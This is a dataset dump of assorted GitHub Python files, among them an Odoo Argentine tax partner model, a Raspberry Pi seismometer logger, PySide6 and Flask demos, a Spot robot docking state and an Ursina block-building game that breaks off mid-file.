seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9339680077 | # -*- coding: utf-8 -*-
from odoo import fields, models, api, _
from odoo.exceptions import UserError
try:
from pysimplesoap.client import SoapFault
except ImportError:
SoapFault = None
import logging
_logger = logging.getLogger(__name__)
class ResPartner(models.Model):
_inherit = "res.partner"
#arba_alicuot_ids = fields.One2many(
# 'res.partner.tax',
# 'partner_id',
# 'Alícuotas PERC-RET',
#)
iibb_number = fields.Char('Ingresos Burtos')
#percepciones_ids = fields.One2many(
# 'res.partner.per',
# 'partner_id',
# 'Percepciones de cliente'
#)
drei = fields.Selection([
('activo', 'Activo'),
('no_activo', 'No Activo'),
],
string='DREI',
)
default_regimen_ganancias_id = fields.Many2one(
'afip.tabla_ganancias.alicuotasymontos',
'Regimen Ganancias por Defecto',
)
gross_income_number = fields.Char(
'Número IIBB',
size=64,
)
gross_income_type = fields.Selection([
('multilateral', 'Multilateral'),
('local', 'Local'),
('no_liquida', 'No Liquida'),
('reg_simplificado', 'Reg.Simplificado'),
],
'Tipo IIBB',
)
gross_income_jurisdiction_ids = fields.Many2many(
'res.country.state',
string='Gross Income Jurisdictions',
help='The state of the company is cosidered the main jurisdiction',
)
start_date = fields.Date(
'Start-up Date',
)
afip_responsability_type_id = fields.Many2one(
'l10n_ar.afip.responsability.type',
'AFIP Responsability Type',
auto_join=True,
index=True,
)
# From
# http://www.sistemasagiles.com.ar/trac/wiki/PadronContribuyentesAFIP
estado_padron = fields.Char(string='Estado AFIP')
imp_ganancias_padron = fields.Selection([
('NI', 'No Inscripto'),
('AC', 'Activo'),
('EX', 'Exento'),
# ('NA', 'No alcanzado'),
# ('XN', 'Exento no alcanzado'),
# ('AN', 'Activo no alcanzado'),
('NC', 'No corresponde'),
],
string='Ganancias',
)
imp_iva_padron = fields.Selection([
('NI', 'No Inscripto'),
('AC', 'Activo'),
('EX', 'Exento'),
('NA', 'No alcanzado'),
('XN', 'Exento no alcanzado'),
('AN', 'Activo no alcanzado'),
# ('NC', 'No corresponde'),
],
string='IVA',
)
integrante_soc_padron = fields.Selection(
[('N', 'No'), ('S', 'Si')],
'Integrante Sociedad',
)
monotributo_padron = fields.Selection(
[('N', 'No'), ('S', 'Si')],
'Monotributo',
)
actividad_monotributo_padron = fields.Char(string='Actividad Monotributo')
empleador_padron = fields.Boolean(string="Padrón Empleador")
#actividades_padron = fields.Many2many(
# 'afip.activity',
# 'res_partner_afip_activity_rel',
# 'partner_id', 'afip_activity_id',
# string='Actividades',
#)
#impuestos_padron = fields.Many2many(
# 'afip.tax',
# 'res_partner_afip_tax_rel',
# 'partner_id', 'afip_tax_id',
# string='Impuestos',
#)
#last_update_padron = fields.Date(
# 'Última Actualización del Padrón',
#)
#def get_arba_alicuota_percepcion(self):
# company = self._context.get('invoice_company')
# date_invoice = self._context.get('date_invoice')
# if date_invoice and company:
# date = fields.Date.from_string(date_invoice)
# arba = self.get_arba_data(company, date)
# return arba.alicuota_percepcion / 100.0
# return 0
#
#def get_arba_alicuota_retencion(self, company, date):
# arba = self.get_arba_data(company, date)
# return arba.alicuota_retencion / 100.0
#
#def get_arba_data(self, company, date):
# self.ensure_one()
# from_date = (date + relativedelta(day=1)).strftime('%Y%m%d')
# to_date = (date + relativedelta(
# day=1, days=-1, months=+1)).strftime('%Y%m%d')
# commercial_partner = self.commercial_partner_id
# arba = self.arba_alicuot_ids.search([
# ('from_date', '=', from_date),
# ('to_date', '=', to_date),
# ('company_id', '=', company.id),
# ('partner_id', '=', commercial_partner.id)], limit=1)
# if not arba:
# arba_data = company.get_arba_data(
# commercial_partner,
# from_date, to_date,
# )
# arba_data['partner_id'] = commercial_partner.id
# arba_data['company_id'] = company.id
# arba = self.arba_alicuot_ids.sudo().create(arba_data)
# return arba
#
#def update_constancia_from_padron_afip(self):
# self.ensure_one()
# return True
#
def get_data_from_padron_afip(self):
self.ensure_one()
cuit = self.cuit_required()
company = self.env.user.company_id
env_type = company._get_environment_type()
try:
certificate = company.get_key_and_certificate(
company._get_environment_type())
except Exception:
certificate = self.env['afipws.certificate'].search([
('alias_id.type', '=', env_type),
('state', '=', 'confirmed'),
], limit=1)
if not certificate:
raise UserError(_(
'Not confirmed certificate found on database'))
company = certificate.alias_id.company_id
padron = company.get_connection('ws_sr_padron_a5').connect()
error_msg = _(
'No pudimos actualizar desde padron afip al partner %s (%s).\n'
'Recomendamos verificar manualmente en la página de AFIP.\n'
'Obtuvimos este error: %s')
try:
padron.Consultar(cuit)
except SoapFault as e:
raise UserError(error_msg % (self.name, cuit, e.faultstring))
except Exception as e:
raise UserError(error_msg % (self.name, cuit, e))
if not padron.denominacion or padron.denominacion == ', ':
raise UserError(error_msg % (
self.name, cuit, 'AFIP no devolvió nombre'))
imp_iva = padron.imp_iva
if imp_iva == 'S':
imp_iva = 'AC'
elif imp_iva == 'N':
imp_iva = 'NI'
vals = {
'name': padron.denominacion,
# 'name': padron.tipo_persona,
# 'name': padron.tipo_doc,
# 'name': padron.dni,
'estado_padron': padron.estado,
'street': padron.direccion,
'city': padron.localidad,
'zip': padron.cod_postal,
'actividades_padron': self.actividades_padron.search(
[('code', 'in', padron.actividades)]).ids,
'impuestos_padron': self.impuestos_padron.search(
[('code', 'in', padron.impuestos)]).ids,
'imp_iva_padron': imp_iva,
# TODAVIA no esta funcionando
# 'imp_ganancias_padron': padron.imp_ganancias,
'monotributo_padron': padron.monotributo,
'actividad_monotributo_padron': padron.actividad_monotributo,
'empleador_padron': padron.empleador == 'S' and True,
'integrante_soc_padron': padron.integrante_soc,
#'last_update_padron': fields.Date.today(),
}
ganancias_inscripto = [10, 11]
ganancias_exento = [12]
if set(ganancias_inscripto) & set(padron.impuestos):
vals['imp_ganancias_padron'] = 'AC'
elif set(ganancias_exento) & set(padron.impuestos):
vals['imp_ganancias_padron'] = 'EX'
elif padron.monotributo == 'S':
vals['imp_ganancias_padron'] = 'NC'
else:
_logger.info(
"We couldn't get impuesto a las ganancias from padron, you"
"must set it manually")
if padron.provincia:
# depending on the database, caba can have one of this codes
caba_codes = ['C', 'CABA', 'ABA']
# if not localidad then it should be CABA.
if not padron.localidad:
state = self.env['res.country.state'].search([
('code', 'in', caba_codes),
('country_id.code', '=', 'AR')], limit=1)
# If localidad cant be caba
else:
state = self.env['res.country.state'].search([
('name', 'ilike', padron.provincia),
('code', 'not in', caba_codes),
('country_id.code', '=', 'AR')], limit=1)
if state:
vals['state_id'] = state.id
if imp_iva == 'NI' and padron.monotributo == 'S':
vals['afip_responsability_type_id'] = self.env.ref(
'l10n_ar.res_RM').id
elif imp_iva == 'AC':
vals['afip_responsability_type_id'] = self.env.ref(
'l10n_ar.res_IVARI').id
elif imp_iva == 'EX':
vals['afip_responsability_type_id'] = self.env.ref(
'l10n_ar.res_IVAE').id
else:
_logger.info(
"We couldn't infer the AFIP responsability from padron, you"
"must set it manually.")
return vals
@api.constrains('gross_income_jurisdiction_ids', 'state_id')
def check_gross_income_jurisdictions(self):
for rec in self:
if rec.state_id and \
rec.state_id in rec.gross_income_jurisdiction_ids:
raise UserError(_(
'Jurisdiction %s is considered the main jurisdiction '
'because it is the state of the company, please remove it'
'from the jurisdiction list') % rec.state_id.name)
#class ResPartnerArbaAlicuot(models.Model):
#_name = "res.partner.tax"
#_order = "to_date desc, from_date desc, tag_id, company_id"
#
#partner_id = fields.Many2one(
# 'res.partner',
# required=True,
# ondelete='cascade',
#)
#tax_id = fields.Many2one(
# 'account.tax',
# 'Impuesto',
# domain=[('type_tax_use', '=', 'supplier')],
#)
#percent = fields.Float('Porcentaje',digits=(6,4))
#tag_id = fields.Many2one(
# 'account.account.tag',
# domain=[('applicability', '=', 'taxes')],
# change_default=True,
#)
#company_id = fields.Many2one(
# 'res.company',
# required=True,
# ondelete='cascade',
# default=lambda self: self.env.user.company_id,
#)
#from_date = fields.Date(
#)
#to_date = fields.Date(
#)
#numero_comprobante = fields.Char(
#)
#codigo_hash = fields.Char(
#)
#alicuota_percepcion = fields.Float(
#)
#alicuota_retencion = fields.Float(
#)
#grupo_percepcion = fields.Char(
#)
#grupo_retencion = fields.Char(
#)
#withholding_amount_type = fields.Selection([
# ('untaxed_amount', 'Untaxed Amount'),
# ('total_amount', 'Total Amount'),
#],
# 'Base para retenciones',
# help='Base amount used to get withholding amount',
#)
#regimen_percepcion = fields.Char(
# size=3,
# help="Utilizado para la generación del TXT para SIRCAR.\n"
# "Tipo de Régimen de Percepción (código correspondiente según "
# "tabla definida por la jurisdicción)"
#)
#regimen_retencion = fields.Char(
# size=3,
# help="Utilizado para la generación del TXT para SIRCAR.\n"
# "Tipo de Régimen de Retención (código correspondiente según "
# "tabla definida por la jurisdicción)"
#)
#api_codigo_articulo_retencion = fields.Selection([
# ('001', '001: Art.1 - inciso A - (Res. Gral. 15/97 y Modif.)'),
# ('002', '002: Art.1 - inciso B - (Res. Gral. 15/97 y Modif.)'),
# ('003', '003: Art.1 - inciso C - (Res. Gral. 15/97 y Modif.)'),
# ('004', '004: Art.1 - inciso D pto.1 - (Res. Gral. 15/97 y Modif.)'),
# ('005', '005: Art.1 - inciso D pto.2 - (Res. Gral. 15/97 y Modif.)'),
# ('006', '006: Art.1 - inciso D pto.3 - (Res. Gral. 15/97 y Modif.)'),
# ('007', '007: Art.1 - inciso E - (Res. Gral. 15/97 y Modif.)'),
# ('008', '008: Art.1 - inciso F - (Res. Gral. 15/97 y Modif.)'),
# ('009', '009: Art.1 - inciso H - (Res. Gral. 15/97 y Modif.)'),
# ('010', '010: Art.1 - inciso I - (Res. Gral. 15/97 y Modif.)'),
# ('011', '011: Art.1 - inciso J - (Res. Gral. 15/97 y Modif.)'),
# ('012', '012: Art.1 - inciso K - (Res. Gral. 15/97 y Modif.)'),
# ('013', '013: Art.1 - inciso L - (Res. Gral. 15/97 y Modif.)'),
# ('014', '014: Art.1 - inciso LL pto.1 - (Res. Gral. 15/97 y Modif.)'),
# ('015', '015: Art.1 - inciso LL pto.2 - (Res. Gral. 15/97 y Modif.)'),
# ('016', '016: Art.1 - inciso LL pto.3 - (Res. Gral. 15/97 y Modif.)'),
# ('017', '017: Art.1 - inciso LL pto.4 - (Res. Gral. 15/97 y Modif.)'),
# ('018', '018: Art.1 - inciso LL pto.5 - (Res. Gral. 15/97 y Modif.)'),
# ('019', '019: Art.1 - inciso M - (Res. Gral. 15/97 y Modif.)'),
# ('020', '020: Art.2 - (Res. Gral. 15/97 y Modif.)'),
#],
# string='Código de Artículo/Inciso por el que retiene',
#)
#api_codigo_articulo_percepcion = fields.Selection([
# ('021', '021: Art.10 - inciso A - (Res. Gral. 15/97 y Modif.)'),
# ('022', '022: Art.10 - inciso B - (Res. Gral. 15/97 y Modif.)'),
# ('023', '023: Art.10 - inciso D - (Res. Gral. 15/97 y Modif.)'),
# ('024', '024: Art.10 - inciso E - (Res. Gral. 15/97 y Modif.)'),
# ('025', '025: Art.10 - inciso F - (Res. Gral. 15/97 y Modif.)'),
# ('026', '026: Art.10 - inciso G - (Res. Gral. 15/97 y Modif.)'),
# ('027', '027: Art.10 - inciso H - (Res. Gral. 15/97 y Modif.)'),
# ('028', '028: Art.10 - inciso I - (Res. Gral. 15/97 y Modif.)'),
# ('029', '029: Art.10 - inciso J - (Res. Gral. 15/97 y Modif.)'),
# ('030', '030: Art.11 - (Res. Gral. 15/97 y Modif.)'),
#],
# string='Código de artículo Inciso por el que percibe',
#)
#api_articulo_inciso_calculo_selection = [
# ('001', '001: Art. 5º 1er. párrafo (Res. Gral. 15/97 y Modif.)'),
# ('002', '002: Art. 5º inciso 1)(Res. Gral. 15/97 y Modif.)'),
# ('003', '003: Art. 5° inciso 2)(Res. Gral. 15/97 y Modif.)'),
# ('004', '004: Art. 5º inciso 4)(Res. Gral. 15/97 y Modif.)'),
# ('005', '005: Art. 5° inciso 5)(Res. Gral. 15/97 y Modif.)'),
# ('006', '006: Art. 6º inciso a)(Res. Gral. 15/97 y Modif.)'),
# ('007', '007: Art. 6º inciso b)(Res. Gral. 15/97 y Modif.)'),
# ('008', '008: Art. 6º inciso c)(Res. Gral. 15/97 y Modif.)'),
# ('009', '009: Art. 12º)(Res. Gral. 15/97 y Modif.)'),
# ('010', '010: Art. 6º inciso d)(Res. Gral. 15/97 y Modif.)'),
# ('011', '011: Art. 5° inciso 6)(Res. Gral. 15/97 y Modif.)'),
# ('012', '012: Art. 5° inciso 3)(Res. Gral. 15/97 y Modif.)'),
# ('013', '013: Art. 5° inciso 7)(Res. Gral. 15/97 y Modif.)'),
# ('014', '014: Art. 5° inciso 8)(Res. Gral. 15/97 y Modif.)'),
#]
#api_articulo_inciso_calculo_percepcion = fields.Selection(
# api_articulo_inciso_calculo_selection,
# string='Artículo/Inciso para el cálculo percepción',
#)
#api_articulo_inciso_calculo_retencion = fields.Selection(
# api_articulo_inciso_calculo_selection,
# string='Artículo/Inciso para el cálculo retención',
#)
#class ResPartnerPer(models.Model):
# _name = "res.partner.per"
# _order = "company_id"
#
# partner_id = fields.Many2one(
# 'res.partner',
# required=True,
# ondelete='cascade',
# )
# tax_id = fields.Many2one(
# 'account.tax',
# 'Impuesto',
# domain=[('type_tax_use', '=', 'sale'),('tax_group_id.l10n_ar_tribute_afip_code','=','09')],
# )
# company_id = fields.Many2one(
# 'res.company',
# required=True,
# ondelete='cascade',
# default=lambda self: self.env.user.company_id,
# )
| codize-app/odoo-argentina | l10n_ar_withholding/models/res_partner.py | res_partner.py | py | 16,227 | python | es | code | 10 | github-code | 1 | [
{
"api_name": "pysimplesoap.client.SoapFault",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "logging.getLogger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "odoo.models.Model",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "... |
14277710480 | import numpy
from obspy.core import read,Trace,Stream,UTCDateTime
import Queue
from threading import Thread
import os.path
import subprocess
import time
from scipy import signal
from scipy.interpolate import interp1d
import Adafruit_ADS1x15
sps = 250 #samples per second
adc = Adafruit_ADS1x15.ADS1115() #create class identifing model used
smoothing = 2 #this controls how much the values are smoothed, 1 is none , >1 is more smoothing
GAIN = 4
frequency = 50
period = 1.0 / frequency
deltaperiod = period*0.15
#this is how after how many samples a block is saved
#block_length=224
time1=1
block_length = int(time1*frequency)
#print block_length
#directories for data
mseed_directory = '/home/pi/RASP_ADC/mseed/'
os.system('rm '+mseed_directory+'*.mseed')
#declare the q from library
queue = Queue.Queue()
adc.start_adc_difference(0,gain=GAIN,data_rate=sps)
def read_data():
value = 0
startTime=time.time() # Time of first sample
t1=startTime # T1 is last sample time
t2=t1
# t3=t1 # T2 is current time
while True:
# if ((t1-t3)/frequency>=0.1):
# t3=t2
# t2=t1
# print 'aggiorno' # T3 aggiorno tempo
#this array is for sample & sample_time
packet=[]
# sample = adc.readADCDifferential23(256, sps)*1000
# sample = adc.read_adc_difference(0, gain=GAIN)
# sample = adc.get_last_result()
# timenow=UTCDateTime()
#this smooths the value, removing high freq
# value += (sample - value ) / smoothing
# packet[0]=value
# packet[1]=timenow
# packet[0]=adc.get_last_result()
# packet[1]=UTCDateTime()
packet.append(adc.get_last_result())
packet.append(t1)
#print sample,timeno
queue.put(packet)
while ((t2-t1) <= period) : # Check if t2-t1 is less then sample period, if it is then update t2
t2=time.time() # and check again
t1+=period # Update last sample time by the sampling period
def test_data():
while True:
if queue.qsize()>=block_length:
#one arrays for reading samples into
data=numpy.zeros([block_length],dtype=numpy.int16)
#this is the loop without storing jitter value and calcs
packet = queue.get()
data[0] = packet[0]
starttime = UTCDateTime(packet[1])
queue.task_done()
for x in range (1,block_length):
packet = queue.get()
data[x] = packet[0]
queue.task_done()
factor=1
## tth = numpy.linspace(0,float(block_length-1)/frequency,block_length)
## f = interp1d(tth,data)
## g = signal.decimate(f(tth),factor,ftype='iir',zero_phase=True)
samplingrate = 1 / (time1/float(block_length/factor))
# print(avg_samplingrate)
stats = {'network': 'TV', 'station': 'RASPI', 'location': '00',
'channel': 'BHZ', 'npts': block_length/factor, 'sampling_rate': samplingrate,
'mseed': {'dataquality': 'D'},'starttime': starttime}
sample_stream = Stream([Trace(data=data, header=stats)])
## sample_stream = Stream([Trace(data=g, header=stats)])
#write sample data
File = mseed_directory + str(sample_stream[0].stats.starttime.date) + '.mseed'
temp_file = mseed_directory + ".temp.tmp"
if os.path.isfile(File):
#writes temp file, then merges it with the whole file, then removes file after
sample_stream.write(temp_file,format='MSEED',reclen=512)
# sample_stream.write(mseed_directory +UTCDateTime.now().isoformat()+".mseed",format='MSEED',reclen=512)
subprocess.call("cat "+temp_file+" >> "+File,shell=True)
subprocess.call(["rm",temp_file])
else:
#if this is the first block of day
sample_stream.write(File,format='MSEED',reclen=512)
# sample_stream.write(File,format='MSEED',encoding='INT16',reclen=512)
worker_sample = Thread(target=test_data)
#worker_sample = Thread(target=save_data)
worker_sample.start()
read_data()
| SpinaCianetti/RASP_ADC | leggi_dati_coda.py | leggi_dati_coda.py | py | 5,153 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "Adafruit_ADS1x15.ADS1115",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.system",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "Queue.Queue",
"li... |
21232514403 | import sys
from PySide6.QtWidgets import QApplication, QPushButton, QGridLayout, QWidget, QBoxLayout, QMainWindow
app = QApplication(sys.argv)
window = QMainWindow()
central_widget = QWidget()
window.setCentralWidget(central_widget)
window.setWindowTitle('Minha janela bonita')
button_1 = QPushButton('Button 1')
button_1.setStyleSheet('font-size: 40px; color: red;')
button_2 = QPushButton('Button 2')
button_2.setStyleSheet('font-size: 40px; color: blue')
button_3 = QPushButton('Button 3')
button_3.setStyleSheet('font-size: 40px; color: green;')
layout = QGridLayout()
central_widget.setLayout(layout)
layout.addWidget(button_1, 1, 1, 1, 1)
layout.addWidget(button_2, 1, 2, 1, 1)
layout.addWidget(button_3, 3, 1, 1, 2)
def slot_example(status_bar):
status_bar.showMessage('O meu slot foi executado')
status_bar = window.statusBar()
status_bar.showMessage('Mostrar mensagem na barra')
menu = window.menuBar()
primeiro_menu = menu.addMenu('Primeiro menu')
primeira_acao = primeiro_menu.addAction('Primeira ação')
primeira_acao.triggered.connect(
lambda: slot_example(status_bar)
)
# central_widget.show()
window.show()
app.exec()
| RossettiBR/curso-python-atualizado | pyside6/04_qmaiwindow_centralwidget.py | 04_qmaiwindow_centralwidget.py | py | 1,155 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "PySide6.QtWidgets.QApplication",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "PySide6.QtWidgets.QMainWindow",
"line_number": 5,
"usage_type": "call"
},
{
"api_name"... |
40255581254 | #!/usr/bin/env python
import rospy
from flexbe_core import EventState, Logger
from bosdyn.client.util import *
from bosdyn.client.lease import LeaseClient, LeaseKeepAlive
from bosdyn.client.frame_helpers import get_odom_tform_body
from bosdyn.api.graph_nav import nav_pb2, graph_nav_pb2
from bosdyn.client.robot_state import RobotStateClient
from bosdyn.client.graph_nav import GraphNavClient
from bosdyn.client import robot_command
from bosdyn.client.docking import DockingClient, blocking_dock_robot, blocking_undock, get_dock_id
from bosdyn.client.lease import LeaseClient
from bosdyn.client.license import LicenseClient
import math
import keyboard
class SwapLease(EventState):
'''
Example for a state to demonstrate which functionality is available for state implementation.
This example lets the behavior wait until the given target_time has passed since the behavior has been started.
<= continue Given time has passed.
<= failed Example for a failure outcome.
'''
def __init__(self, dock_id):
# Declare outcomes, input_keys, and output_keys by calling the super constructor with the corresponding arguments.
super(SwapLease, self).__init__(outcomes = ['continue', 'failed'],
input_keys = ['lease', 'robot_command_client', 'license_client', 'robot', 'state_client'])
self._dock_id = dock_id
self._return_failure = bool
def execute(self, userdata):
return 'continue'
def should_dock(self, userdata, dock):
if dock:
print("docking the robot at ", self._dock_id)
robot_command.blocking_stand(userdata.robot_command_client)
blocking_dock_robot(userdata.robot, self._dock_id)
self._return_failure = False
print("successfully docked the robot at the given dock id............................")
else:
print("undocking the robot....................")
dock_id = get_dock_id(userdata.robot)
print("dock_id found is ", dock_id)
print("dock_id given is ", self._dock_id)
if dock_id != self._dock_id:
print("dock ids doesn't match..........................")
self._return_failure = True
else:
blocking_undock(userdata.robot)
self._return_failure = False
print("successfully undocked the robot from dock id ", dock_id, "......................")
def on_enter(self, userdata):
# This method is called when the state becomes active, i.e. a transition from another state to this one is taken.
# It is primarily used to start actions which are associated with this state.
print("on enter.........")
if not userdata.license_client.get_feature_enabled([DockingClient.default_service_name
])[DockingClient.default_service_name]:
print('This robot is not licensed for docking.')
sys.exit(1)
# with LeaseKeepAlive(userdata.lease):
# userdata.robot.power_on()
# self.should_dock(userdata, False)
while True:
if keyboard.is_pressed("enter"):
print("Exiting the loop...............")
break
else:
print("--------------------------------------@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@--------------------------")
print(userdata.state_client.get_robot_state())
print("----------------------------------------------------------------")
# self.should_dock(userdata, True)
print("done on enter............")
def on_exit(self, userdata):
# This method is called when an outcome is returned and another state gets active.
# It can be used to stop possibly running processes started by on_enter.
pass # Nothing to do in this example.
def on_start(self):
# This method is called when the behavior is started.
# If possible, it is generally better to initialize used resources in the constructor
# because if anything failed, the behavior would not even be started.
pass
def on_stop(self):
# This method is called whenever the behavior stops execution, also if it is cancelled.
# Use this event to clean up things like claimed resources.
pass # Nothing to do in this example.
| yashpatel1392/spot_nav_behaviors | spot_nav_flexbe_states/src/spot_nav_flexbe_states/swap_lease.py | swap_lease.py | py | 4,565 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flexbe_core.EventState",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "bosdyn.client.robot_command.blocking_stand",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "bosdyn.client.robot_command",
"line_number": 44,
"usage_type": "name"
... |
74659052512 | import argparse
import re
from datetime import datetime
from cli.models.models import CliData, PHONE, LOGIN, PASSWORD, SIP_DEVICE, \
SIP_ENABLED, IDENTIFY_LINE
from cli.utils.help_message import *
CHOICE_FILTER = ['all', 'activate', 'deactivate']
CHOICE_ACTION = ['a', 'd']
CHOICE_VIEW = [PHONE, LOGIN, PASSWORD, SIP_DEVICE, SIP_ENABLED, IDENTIFY_LINE]
class NumsAction(argparse.Action):
"""
A class for extended handler input nums, it converts bash-string
separated by spaces or \n in the list.
"""
def __init__(self, option_strings, dest, nargs=None, **kwargs):
super(NumsAction, self).__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, re.split('\n| ', values))
def arg_parse() -> CliData:
time_fmt = "%Y-%m-%d_%H-%M"
timestamp = datetime.strftime(datetime.now(), format=time_fmt)
filename = f'vats_{timestamp}.xlsx'
arg_engine = argparse.ArgumentParser(prog='cli')
arg_engine.add_argument("-f",
type=str,
nargs='?',
const=filename,
default=None,
dest='filename',
help=HELP_F)
arg_engine.add_argument("-l",
action="store_false",
dest='display',
help=HELP_L)
arg_engine.add_argument("-v",
type=str,
nargs='+',
help=HELP_V,
default=['all', ],
dest='view',
choices=CHOICE_VIEW)
arg_engine.add_argument("--action",
type=str,
nargs='+',
default=None,
dest='action',
choices=CHOICE_ACTION,
help=HELP_ACTION)
arg_engine.add_argument("--login",
type=str,
dest='login',
required=True,
help=HELP_LOGIN)
arg_engine.add_argument("--nums",
type=str,
nargs='+',
dest="nums",
action=NumsAction,
help=HELP_NUMS)
arg_engine.add_argument("--filter",
nargs='?',
default='all',
dest='filter',
choices=CHOICE_FILTER,
help=HELP_FILTER)
args = arg_engine.parse_args()
cli_data = CliData(**vars(args))
return cli_data
| Kotletta-TT/cbot-cm-trunk-producer-mts | cli/utils/arg_parse.py | arg_parse.py | py | 2,873 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "cli.models.models.PHONE",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "cli.models.models.LOGIN",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "cli.models.models.PASSWORD",
"line_number": 11,
"usage_type": "name"
},
{
"api_na... |
39483432719 | import json
from datetime import datetime, timedelta
from app import app, db, models
from flask import render_template, jsonify, request
@app.route('/')
@app.route('/index')
def index():
username = request.args.get('username')
if username is None:
return 'user name must be specified as ?username=xxx'
return render_template('index.html', username=username)
@app.route('/admin')
def admin():
username = request.args.get('username')
if username is None:
return 'user name must be specified as ?username=xxx'
return render_template('admin.html', username=username)
@app.route('/_add_star', methods=['GET', 'POST'])
def add_star():
model = db.get_model()
username = request.args.get('username')
if username is None:
return 'Exception: user name not specified'
reason = request.args.get('reason')
if reason is not None:
app.logger.info('setting reason to ' + reason)
timestamp = request.args.get('timestamp')
s = models.Score(username=username, reason=reason, timestamp=int(timestamp))
model.create(username, s.to_dict())
return 'Star added'
@app.route('/_reset_star', methods=['POST'])
def reset_star():
model = db.get_model()
username = request.args.get('username')
if username is None:
return 'Exception: user name not specified'
model.reset(username)
return 'Star reset'
@app.route('/_get_stars', methods=['GET'])
def get_star():
model = db.get_model()
username = request.args.get('username')
stars = model.list(username)
for star in stars:
star.pop('_id', None)
return jsonify(stars)
@app.route('/_get_stars_count', methods=['GET'])
def get_stars_count():
model = db.get_model()
username = request.args.get('username')
stars_count = model.count(username)
return stars_count
| laofeizhu/reward_chart | app/routes.py | routes.py | py | 1,765 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.request.args.get",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "flask.re... |
72040607393 | """
This entire file is deprecated and will be deleted when MVC is working
"""
# import something for getting error codes
import validators
import re
import logging
logger = logging.getLogger(__name__) # now we use logger.debug, etc.
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter(style="{", fmt="{asctime} [{levelname}] {message}", datefmt="%d.%m.%Y %H:%M:%S")
file_handler = logging.FileHandler('url_validator.log')
file_handler.setFormatter(formatter)
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
stream_handler.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
def url_is_valid(link):
'''
# regular expression - must be with this beginning:
pattern = re.compile(r'^https://www.youtube.com/watch\?v=')
# test later
if len(pattern)== 0:
return False
'''
return validators.url(link)
# link for testing purposes: https://www.youtube.com/watch?v=ehs6vQTFPoA
| fromCharCode/YouTube-Downloader | url_validator.py | url_validator.py | py | 1,000 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "logging.Formatter",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "logging.FileHa... |
22586754727 | import commentjson as json
import os
class Config:
def __init__(self, dictfile):
self.dictfile = dictfile
if not os.path.exists(self.dictfile):
with open(self.dictfile, 'w', encoding='utf-8') as file:
json.dump({
"users": {
"testUser": "password"
},
"logfmt": "{%(name)s} %(levelname)s: %(message)s",
"logLevel": "DEBUG"
}, file, indent=4)
def load(self) -> dict:
with open(self.dictfile, 'r', encoding='utf-8') as file:
return json.load(file)
def dump(self, dictionary) -> None:
with open(self.dictfile, 'w', encoding='utf-8') as file:
json.dump(dictionary, file, indent=4)
| timoxa0/Reshala | server/configctl.py | configctl.py | py | 815 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.exists",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "commentjson.dump",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "commentjson.load",
"li... |
71442561313 | from ursina import *
from ursina.prefabs.first_person_controller import FirstPersonController
app = Ursina()
grass_texture = load_texture('assets/grass_block.png')
stone_texture = load_texture('assets/stone_block.png')
brick_texture = load_texture('assests/brick_block.png')
dirt_texture = load_texture('assets/dirt_block.png')
sky_texture = load_texture('assets/skybox.png')
arm_texture = load_texture('assets/arm_texture.png')
punch_sound=Audio('assets/punch_sound',loop=False, autoplay=False)
block_pick = 1 #<----creating a variable for creating blocks
def update():
global block_pick
if held_keys['left mouse'] or held_keys['right mouse']:
hand.active()
else:
hand.passive()
if held_keys['1']: block_pick=1
if held_keys['2']: block_pick=2
if held_keys['3']: block_pick=3
if held_keys['4']: block_pick=4
class Voxel(Button): #creating a class containing cube methods
def __init__(self, position=(0,0,0),texture=grass_texture):
super().__init__(
parent= scene,
position=position,
model= 'assets/block',
origin_y= 0.5,
texture = texture ,
color=color.color(0,0,random.uniform(0.9,1)),
scale = 0.5
)
def input(self,key): #lets you create
if self.hovered:
if key == 'left mouse down': # establishing loop for the creation new cubes
punch_sound.play()
if block_pick == 1:voxel= Voxel(position=self.position+ mouse.normal,texture = grass_texture)
if block_pick == 2:voxel= Voxel(position=self.position+ mouse.normal,texture = stone_texture)
if block_pick == 3:voxel= Voxel(position=self.position+ mouse.normal,texture = brick_texture)
if block_pick == 4:voxel= Voxel(position=self.position+ mouse.normal,texture = dirt_texture)
if key == 'right mouse down':
punch_sound.play()
destroy(self)
class Sky(Entity):
def __init__(self):
super().__init__(
parent = scene,
model='sphere',
texture = sky_texture,
scale=150,
double_sided=True
)
class Hand(Entity):
def __init__(self):
super().__init__(
parent= camera.ui,
model= 'assets/arm',
